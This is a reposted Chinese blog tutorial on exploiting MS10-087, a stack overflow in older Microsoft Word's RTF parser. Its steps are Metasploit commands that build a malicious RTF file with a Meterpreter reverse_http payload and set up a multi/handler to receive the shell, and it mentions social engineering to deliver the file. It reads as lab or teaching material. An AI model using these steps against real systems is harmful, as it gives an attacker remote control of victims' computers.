简介
如果用户打开或预览特制的RTF电子邮件,则最严重的漏洞可能允许远程执行代码。成功利用这些漏洞中的任何一个的攻击者可以获得与本地用户相同的用户权限。与使用管理用户权限进行操作的用户相比,将其帐户配置为在系统上具有较少用户权限的用户受到的影响较小。
低版本的word版本会出现RTF文件漏洞。
漏洞:microsoft word中的RTF分析器中的pFragments属性容易受到栈缓存区溢出攻击
受影响的系统:Microsoft Office XP SP,2003 SP3,2007 SP2,2010 x32,2010 x64,Microsoft Office for
启动msf
命令:msfconsole
搜索MS10_087漏洞
命令:search ms10_087
使用攻击模块
命令::use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
设置恶意文件
命令:set FILENAME ms10087.rtf
设置payload
命令:set payload windows/meterpreter/reverse_http
设置用于接受从目标机弹回的shell
开始攻击
命令:run
将/home/jack/.msf4/local/ms10087.rtf下的文件传到靶机上
现实中我们可以利用社会工程学的知识传到目标机上,在这里我们直接上传上去
进入multi/handler模块
设置payload
命令:set payload windows/meterpreter/reverse_http
设置用于接受从目标机弹回的shell
开始攻击
命令:run
shell
[外链图片转存中…(img-aq7Vliaz-1674722518515)]
开始攻击
命令:run
文章转载自:https://blog.csdn.net/qq_62803993/article/details/128766214
郑重声明:本文版权归原作者所有,转载文章仅为传播更多信息之目的,如作者信息标记有误,请第一时间联系我们修改或删除,多谢。
本文链接:https://www.jhelp.net/p/GG38qDP0KO66lxtn (转载请保留)。
关注下面的标签,发现更多相似文章